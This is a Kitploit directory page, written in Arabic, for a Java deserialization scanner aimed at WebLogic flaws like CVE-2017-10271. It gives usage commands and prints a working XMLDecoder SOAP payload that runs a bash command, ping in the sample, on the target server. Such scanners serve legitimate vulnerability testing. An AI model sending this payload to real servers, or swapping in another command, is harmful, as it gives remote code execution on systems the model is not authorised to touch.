Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
JavaDeserialization — ماسح ضوئي لثغرات إلغاء تسلسل Java (Deserialization) يستهدف ثغرات مشابهة لـ CVE-2017-10271. | Kitploit
أدوات/GitHubGitHub/etocheney/javadeserialization
ماسحات الثغرات الأمنيةتخطيط الشبكةتوليد الحمولةمسح المنافذالاستغلالاستغلال تطبيقات الويب
GitHubetocheney/javadeserialization

JavaDeserialization

ماسح ضوئي لثغرات إلغاء تسلسل Java (Deserialization) يستهدف ثغرات مشابهة لـ CVE-2017-10271.

عرض المستودع
9112منذ 7 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

كشف ثغرات إلغاء تسلسل Java

ماسح ثغرات إلغاء تسلسل Java يستهدف ثغرات مشابهة لثغرة CVE-2017-10271، يحتوي هذا المشروع على PoC واحد فقط، ولم يتم تنظيم البقية حتى الآن.

التثبيت

  1. تثبيت nmap

    https://nmap.org/download.html قم بتنزيل الإصدار المناسب وفقًا لنظام التشغيل وتثبيته.

  2. تثبيت حزم الطرف الثالث

    pip install -r requirements.txt

  3. المسح

    عدّل ملف PoC، وغيّر عنوان IP في أمر ping إلى عنوان IP الخاص بك

    عدّل كود sniff في السطر 25

    root@kitploit:~
    sniff(filter='icmp and yourIP',prn=packet_callback)
    

    java_scan.py -i عنوان_IP [options] java_scan.py -h للحصول على المساعدة

الاستخدام

1. PoC

تأكد من تعديل ملف PoC قبل الاستخدام، وغيّر عنوان IP في أمر ping إلى عنوان IP الخاص بك

ملف PoC عبارة عن ملفين بصيغة JSON مخصصين لنظامي Windows وLinux على التوالي (لا تتوفر حالياً ميزة تحديد مسار ملف PoC، وسيتم إضافتها في الإصدارات القادمة). يجب تسمية ملفي PoC باسمي poc.json وpoc_win.json في دليل البرنامج.

بخصوص تنسيق ملف PoC (إصدار Linux، وإصدار Windows مشابه)

root@kitploit:~
{
  "url":"wls-wsat/CoordinatorPortType",
  "header": "Content-Type:text/xml",
  "data": [
    "<soapenv:Envelope xmlns:soapenv='http://schemas.xmlsoap.org/soap/envelope/'>",
        "<soapenv:Header>",
            "<work:WorkContext xmlns:work='http://bea.com/2004/06/soap/workarea/'>",
               "<java version='1.8.0_131' class='java.beans.XMLDecoder'>",
                    "<void class='java.lang.ProcessBuilder'>",
                        "<array class='java.lang.String' length='3'>",
                            "<void index='0'>",
                                "<string>/bin/bash</string>",
                            "</void>",
                            "<void index='1'>",
                                "<string>-c</string>",
                            "</void>",
                            "<void index='2'>",
                                "<string>ping 10.60.18.5 -c 2</string>",
                            "</void>",
                        "</array>",
                    "<void method='start'/></void>",
                "</java>",
            "</work:WorkContext>",
        "</soapenv:Header>",
        "<soapenv:Body/>",
    "</soapenv:Envelope>"
  ]
}

يحدد الحقل url مسار الاستغلال، ويحدد الحقل header محتوى الترويسة المضافة إلى حزمة POST، أما data فهو المحتوى المتسلسل الذي سيتم إرساله.

ملاحظة: يجب أن يُرجع هذا الـ PoC حزمتي ping من المضيف الهدف، ولا يمكن للبرنامج تأكيد وجود الثغرة إلا عند اكتشاف حزم ICMP.

2. استخدام nmap لمسح الشبكة المحلية

يقوم البرنامج افتراضيًا باستدعاء nmap لمسح الشبكة المحلية

root@kitploit:~
java_scan.py -i 192.168.0.1

يقوم هذا المسح بفحص المنفذ 7001 على المضيف 192.168.0.1

3. تحديد عنوان IP والمنفذ

تحديد عنوان IP ومنفذ واحد

java_scan.py -i 192.168.0.1 -p 7001

تحديد عدة عناوين IP ومنافذ متعددة

java_scan.py -i 192.168.0.1,2,55 -p 7001,8001,9001

تحديد نطاق عناوين IP ونطاق منافذ

java_scan.py -i 192.168.0.1-255 -p 7000-8000

4. فحص سريع للمنافذ المفتوحة

عند استخدام المعامل -f، سيتم استدعاء socket لإجراء فحص سريع للمنافذ

java_scan.py -i 192.168.0.1-255 -p 7001 -f

تحديد عدد الخيوط (threads) لفحص المنافذ السريع

java_scan.py -i 192.168.0.1-255 -p 7001 -f -t 100

5. النتيجة

النتيجة

تنزيل الأداة